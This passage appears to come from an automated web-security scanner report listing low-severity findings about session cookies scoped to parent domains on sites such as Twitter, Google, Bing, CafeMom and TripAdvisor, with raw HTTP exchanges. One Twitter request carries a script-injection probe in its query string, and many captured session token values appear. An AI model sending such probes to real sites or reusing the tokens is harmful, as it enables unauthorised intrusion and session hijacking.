_twitter_sess=BAh7CToVaW5fbmV3X3VzZXJfZmxvdzA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4%250ANTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCPJP%250Aud4tAQ%253D%253D--68405592e8acf69fc0a9e659d46c67302e2aaff9; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?d526a%22-alert(1)-%22d9a91211762=1 HTTP/1.1
Host: m.twitter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1296227675375304; guest_id=129622767594873093; admobuu=9deea9d91b436e9e39a07f6b1817f30c; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296314194.1296521894.4; __utmc=43838368; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CToVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwjyT7neLQEi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--5c974d691e965b8a33f1e7ca63b5b1cbad6a6cc3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:12:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296565948-67164-35116
ETag: "b6c107b149a76a496c81c52a4999e7a9"-gzip
Last-Modified: Tue, 01 Feb 2011 13:12:28 GMT
X-Runtime: 0.04742
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToVaW5fbmV3X3VzZXJfZmxvdzA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4%250ANTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCPJP%250Aud4tAQ%253D%253D--68405592e8acf69fc0a9e659d46c67302e2aaff9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 708

<html><head>
<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location="http://mobile.twitter.com" + a.replac
...[SNIP]...

11.3. http://sorry.google.com/sorry/Captcha previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sorry.google.com
Path:	/sorry/Captcha

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; path=/; domain=google.com; expires=Wed, 02-Feb-2011 19:28:06 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dstatic%2B2mdn%2Bnet%26channel%3Dlinkdoctor&id=4050288757061532411&captcha=coestful&submit=Submit HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
Referer: http://sorry.google.com/sorry/?continue=http://www.google.com/search%3Fq%3Dstatic%2B2mdn%2Bnet%26channel%3Dlinkdoctor
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; S=sorry=6N0zPerLQtaqcOPwyzNvWg

Response

HTTP/1.1 200 OK
Set-Cookie: GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; path=/; domain=google.com; expires=Wed, 02-Feb-2011 19:28:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?q=static+2mdn+net&channel=linkdoctor
Date: Wed, 02 Feb 2011 16:28:06 GMT
Content-Type: text/html; charset=UTF-8
Server: GCS/1.0
Content-Length: 468
X-XSS-Protection: 1; mode=block
Expires: Wed, 02 Feb 2011 16:28:06 GMT

<HTML><HEAD>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>Redirecting</TITLE>
<META HTTP-EQUIV="refresh" content="1; url=http://www.google.com/search?q=static+2mdn+net&amp
...[SNIP]...

11.4. http://www.bing.com/travel/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=F9A5BDF8554B5A521E4ADD0F53F06045; Domain=.bing.com; Path=/travel
ETID=BCID-kn9rba4tmh4byz7aru4ncjhjrr6_VID-z1ardgqj2preelyz6fq87n8dokpko_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:37 GMT; Path=/travel
_SS=SID=914A77BB8D3B44F08D853573E93F3935; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cce78c16cfad246628701c059bb2c872b; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/?cid=msn_nav_lifestyle&FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.5. http://www.bing.com/travel/deals/airline-ticket-deals.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/airline-ticket-deals.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=939166F93ADAFBDCA0C706CED4E4498E; Domain=.bing.com; Path=/travel
ETID=BCID-z6veri81lohd4eyz731qogjsh6trg_VID-5hgouum15ig37yz5flek5lnv1ko4_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:42 GMT; Path=/travel
_SS=SID=F623F5DE46884100AAF307099DE30493; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9c879636e910490c875b1aa66da44d12; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.6. http://www.cafemom.com/group/416 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafemom.com
Path:	/group/416

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=kaal1k0po2hun5f30108dr9mr2; path=/; domain=.cafemom.com
PHPSESSID=m2opnk57fo2c72ffiiqtijl195; path=/; domain=.cafemom.com
cafemomis=m2opnk57fo2c72ffiiqtijl195; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
fp=%2Fgroup%2F416; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /group/416 HTTP/1.1
Host: www.cafemom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://www.cafemom.com/group/46574 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafemom.com
Path:	/group/46574

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=43jec9pqr9f52f3a8egcl5ds32; path=/; domain=.cafemom.com
PHPSESSID=tfb5j3dg583h0nb9s3uo6m6j85; path=/; domain=.cafemom.com
cafemomis=tfb5j3dg583h0nb9s3uo6m6j85; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
fp=%2Fgroup%2F46574; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /group/46574 HTTP/1.1
Host: www.cafemom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 04:07:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=43jec9pqr9f52f3a8egcl5ds32; path=/; domain=.cafemom.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=tfb5j3dg583h0nb9s3uo6m6j85; path=/; domain=.cafemom.com
Set-Cookie: cafemomis=tfb5j3dg583h0nb9s3uo6m6j85; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
Set-Cookie: fp=%2Fgroup%2F46574; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com
Location: http://www.cafemom.com/groups/index.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

11.8. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=974g2e82tiitvpprcuqksnv1h6; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
VisitorID=149810701; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
VisitID=162148332; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Sun, 03-Apr-2011 15:45:16 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=974g2e82tiitvpprcuqksnv1h6; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Wed, 01-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Tue, 02-Feb-2010 15:45:15 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=149810701; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=162148332; expires=Thu, 02-Feb-2012 15:45:16 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Sun, 03-Apr-2011 15:45:16 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

11.9. http://www.faneuilhallmarketplace.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.faneuilhallmarketplace.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS822634fc18c5655cb7b0ed0444b1667e=settnkvgpsrtn2un8knl5ldnl4; expires=Fri, 25-Feb-2011 19:19:40 GMT; path=/; domain=.faneuilhallmarketplace.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.faneuilhallmarketplace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:46:20 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/5.3.0 PHP/4.4.2
X-Powered-By: PHP/5.3.0
Set-Cookie: SESS822634fc18c5655cb7b0ed0444b1667e=settnkvgpsrtn2un8knl5ldnl4; expires=Fri, 25-Feb-2011 19:19:40 GMT; path=/; domain=.faneuilhallmarketplace.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 15:46:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
...[SNIP]...

11.10. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hotels.com
Path:	/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SESSID=BFCC292E8C0621AA80BCE939DC8ED021.hm04tc03; Domain=.hotels.com; Path=/
guid=2ee125b2-c3d7-49a1-b623-8a4cdfa3d152; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/
jsEnabled=false; Domain=.hotels.com; Expires=Thu, 03-Feb-2011 15:57:56 GMT; Path=/
user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ho113791/millennium-bostonian-hotel-boston-boston-united-states/ HTTP/1.1
Host: www.hotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.11. http://www.mywot.com/en/scorecard/2mdn.net previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mywot.com
Path:	/en/scorecard/2mdn.net

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSf6ce7e3db235723091e59a653e7d96f2=rns4pide46ij4qaq1o3bcot9k0; path=/; domain=.mywot.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/scorecard/2mdn.net HTTP/1.1
Host: www.mywot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESSf6ce7e3db235723091e59a653e7d96f2=rns4pide46ij4qaq1o3bcot9k0; path=/; domain=.mywot.com
Set-Cookie: wot_lang=en; expires=Tue, 02-Aug-2011 04:47:40 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 04:47:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
X-FRAME-OPTIONS: DENY
Connection: close
Date: Thu, 03 Feb 2011 04:47:40 GMT
Server: lighttpd
Content-Length: 27579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...

11.12. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bq5tf9g3uvqm673m03ri4i84t1; expires=Thu, 24-Feb-2011 18:03:51 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:31 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bq5tf9g3uvqm673m03ri4i84t1; expires=Thu, 24-Feb-2011 18:03:51 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 01 Feb 2011 14:16:22 GMT
ETag: "ab0f95b58f9910d226583b673fe2f938"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.13. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lh5k6rqi5q4rg55ah9ia2nnpp2; expires=Thu, 24-Feb-2011 18:03:49 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:29 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lh5k6rqi5q4rg55ah9ia2nnpp2; expires=Thu, 24-Feb-2011 18:03:49 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 01 Feb 2011 14:16:17 GMT
ETag: "7ccb226d65a12e3b7695202e6cc84210"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.14. http://www.pctools.com/free-antivirus/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pctools.com
Path:	/free-antivirus/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=771d08fef2eb643a0448e203f42a969f; expires=Thu, 03 Feb 2011 08:00:19 GMT; path=/; domain=pctools.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free-antivirus/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Thu, 03 Feb 2011 06:48:20 GMT
Content-Length: 31858
Connection: close
Set-Cookie: PHPSESSID=771d08fef2eb643a0448e203f42a969f; expires=Thu, 03 Feb 2011 08:00:19 GMT; path=/; domain=pctools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Free AntiVirus Download and Removal | PC Tools AntiVirus</title>
<met
...[SNIP]...

11.15. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tripadvisor.com
Path:	/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TASession=%1%V2ID.B6476C06D407A2CFBBFE8118B231FB4F*SQ.1*LS.Hotel_Review*GR.51*TCPAR.95*TBR.68*EXEX.79*ABTR.3*PPRP.62*PHTB.11*FS.65*HS.popularity*ES.popularity*AS.popularity*DS.5*CU.USD*TFT.3*DF.0*FP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*LP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*MS.7*TRA.true*LL.1826400*LD.114150*EWS.Hotel_Review; Domain=.tripadvisor.com; Path=/
v1st=32DEE8430F77FBAD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tripadvisor.com
TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3*RVL.114150_33; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
TAUnique=%1%enc%3ApD%2BeiqxH3FFd8LGI8QbYY0XbcR4szT2MqK8w8U77pH43b9QLS6G90g%3D%3D; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
BEPIN=%1%12de72abfc8%3Brev08a%3A8754%3Bmed02a%3A8739%3Bbak05a%3A5465%3Busr02a%3A8737%3Bbak02a%3A9090%3B; Domain=.tripadvisor.com; Path=/
CM=%1%SubPopup%2C%2C-1%7CSubSessionPopup%2C1%2C-1%7Csh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
TAReturnTo=%1%%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html; Domain=.tripadvisor.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html HTTP/1.1
Host: www.tripadvisor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:14 GMT
Server: Apache
Set-Cookie: v1st=32DEE8430F77FBAD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tripadvisor.com
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3*RVL.114150_33; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.B6476C06D407A2CFBBFE8118B231FB4F*SQ.1*LS.Hotel_Review*GR.51*TCPAR.95*TBR.68*EXEX.79*ABTR.3*PPRP.62*PHTB.11*FS.65*HS.popularity*ES.popularity*AS.popularity*DS.5*CU.USD*TFT.3*DF.0*FP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*LP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*MS.7*TRA.true*LL.1826400*LD.114150*EWS.Hotel_Review; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3ApD%2BeiqxH3FFd8LGI8QbYY0XbcR4szT2MqK8w8U77pH43b9QLS6G90g%3D%3D; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
Set-Cookie: ServerPool=B; Domain=.tripadvisor.com; Path=/
Set-Cookie: BEPIN=%1%12de72abfc8%3Brev08a%3A8754%3Bmed02a%3A8739%3Bbak05a%3A5465%3Busr02a%3A8737%3Bbak02a%3A9090%3B; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%SubPopup%2C%2C-1%7CSubSessionPopup%2C1%2C-1%7Csh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
Set-Cookie: TAReturnTo=%1%%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html; Domain=.tripadvisor.com; Path=/
Vary: Accept-Encoding
Connection: close
